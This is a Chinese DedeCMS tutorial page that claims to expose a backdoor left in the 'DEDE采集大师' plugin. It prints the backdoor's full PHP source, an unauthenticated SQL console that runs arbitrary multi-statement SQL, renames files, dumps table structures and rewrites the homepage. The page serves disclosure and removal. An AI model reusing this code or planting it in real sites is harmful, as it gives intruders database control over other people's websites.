• [织梦吧]唯一域名:www.dedecms8.com,织梦DedeCMS学习平台.

TAGS:手机刷机 QQ2014下载织梦教程DEDECMS自学教程DedeCMS模板站长下载

当前位置: > DedeCMS教程 > DedeCMS安装使用 >

DEDE采集大师官方留后门的删除办法

来源: www.dedecms8.com 编辑:织梦吧 时间:2012-01-16点击:


<?php
require_once(dirname(__FILE__)."/../include/common.inc.php");
if(emptyempty($dopost))
{
$dopost = "";
}
if($dopost=="rename")
{
if(rename('dedesql.query.php','arc.sqlquery.class.php')){
echo "成功!";
}else{
echo "失败!";
}
exit();
}
if($dopost=="viewinfo")
{
if(emptyempty($tablename))
{
echo "没有指定表名!";
}
else
{
$dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename);
$dsql->Execute('me');
$row2 = $dsql->GetArray('me',MYSQL_BOTH);
$ctinfo = $row2[1];
echo "<xmp>".trim($ctinfo)."</xmp>";
}
exit();
}
if($dopost=="index")
{
require_once(DEDEINC.'/arc.partview.class.php');
$envs = $_sys_globals = array();
$envs['aid'] = 0;
$pv = new PartView();
$row = $pv->dsql->GetOne('Select * From `dede_homepageset`');
$templet = str_replace("{style}",$cfg_df_style,$row['templet']);
$homeFile = dirname(__FILE__).'/'.$row['position'];
$homeFile = str_replace("//","/",str_replace("\\","/",$homeFile));
$fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置");
fclose($fp);
$tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet;
$pv->SetTemplet($tpl);
$pv->SaveToHtml($homeFile);
$pv->Close();
echo "成功更新首页!";
exit();
}
else if($dopost=="query")
{
$sqlquery = trim(stripslashes($sqlquery));
if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery))
{
echo "<span>删除'数据表'或'数据库'的语句不允许在这里执行。</span>";
exit();
}
if(eregi("^select ",$sqlquery))
{
$dsql->SetQuery($sqlquery);
$dsql->Execute();
if($dsql->GetTotalRow()<=0)
{
echo "运行SQL:{$sqlquery},无返回记录!";
}
else
{
echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!";
}
$j = 0;
while($row = $dsql->GetArray())
{
$j++;
if($j>100)
{
break;
}
echo "<hr size=1/>";
echo "记录:$j";
echo "<hr size=1/>";
foreach($row as $k=>$v)
{
echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n";
}
}
exit();
}
if($querytype==2)
{
$sqlquery = str_replace("\r","",$sqlquery);
$sqls = split(";[ \t]{0,}\n",$sqlquery);
$nerrCode = "";$i=0;
foreach($sqls as $q)
{
$q = trim($q);
if($q=="")
{
continue;
}
$dsql->ExecuteNoneQuery($q);
$errCode = trim($dsql->GetError());
if($errCode=="")
{
$i++;
}
else
{
$nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>";
}
}
echo "成功执行{$i}个SQL语句!<br><br>";
echo $nerrCode;
}
else
{
$dsql->ExecuteNoneQuery($sqlquery);
$nerrCode = trim($dsql->GetError());
echo "成功执行1个SQL语句!<br><br>";
echo $nerrCode;
}
exit();
}
if($dopost=="view")
{
;echo '<html>
<head>
<meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'>
<title>SQL命令行工具</title>
<link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'>
</head>
<body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'>
<table cellpadding="3" cellspacing="1" bgcolor="#D1DDAA">
<tr>
<td background="img/tbg.gif">
<table cellspacing="1" cellpadding="1">
<tr>
<td><strong>SQL命令运行器:</strong></td>
<td> <b><a href="sys_data.php"><u>数据备份</u></a></b>
| <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#FFFFFF" valign="top">
<table cellspacing="4" cellpadding="2">
<form action="" method="post" target="stafrm">
<input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' />
<tr bgcolor="#F3FBEC">
<td>系统的表信息:</td>
<td>
<table cellspacing="0" cellpadding="0">
<tr>
<td>
<select size="6">
';
$dsql->SetQuery("Show Tables");
$dsql->Execute('t');
while($row = $dsql->GetArray('t',MYSQL_BOTH))
{
$dsql->SetQuery("Select count(*) From ".$row[0]);
$dsql->Execute('n');
$row2 = $dsql->GetArray('n',MYSQL_BOTH);
$dd = $row2[0];
echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n";
}
;echo ' </select>
</td>
<td> </td>
<td valign="bottom">
<div>
<input type="Submit" value="优化选中表" />
<br />
<input type="Submit" value="修复选中表" />
<br />
<input type="Submit" value="查看表结构" />
</div>
<div>
<input type="Submit" value="优化全部表" />
<br />
<input type="Submit" value="修复全部表" />
</div>
</td>
</tr>
</table></td>
</tr>
<tr>
<td>返回信息:</td>
<td>
<iframe frameborder="0"></iframe>
</td>
</tr>
</form>
<form action="" method="post" target="stafrm">
<input type=\'hidden\' name=\'dopost\' value=\'query\'>
<tr>
<td colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行:
<input type="radio" value="0">
单行命令(支持简单查询)
<input type="radio" value="2" checked>
多行命令</strong></td>
</tr>
<tr>
<td colspan="2">
<textarea cols="60" rows="10"></textarea>
</td>
</tr>
<tr>
<td> </td>
<td>
<input type="image" src="img/button_ok.gif" class=\'np\' />
</td>
</tr>
</form>
</table>
</td>
</tr>
</table>
</body>
</html>
';}
?>

标签: dede采集大师 后门

猜您也喜欢...

栏目导航
更多>>
DedeCMS安装使用
DedeCMS模板标签
Dedecms二次开发
DedeCMS漏洞与安全
猜你也喜欢看这些...

热门TagS

织梦CMS

织梦下载 织梦模板 织梦教程 织梦标签 织梦手册 织梦安全 织梦视频 织梦论坛

CMS

下载

站长下载 手机ROM 网页模板 好站推荐

教程资源

About D8

  • ©2014 织梦吧(d8) DedeCMS学习交流平台
  • 唯一网址 www.DedeCMS8.com 网站地图
  • 联系我们 1170734538@qq.com ,  QQ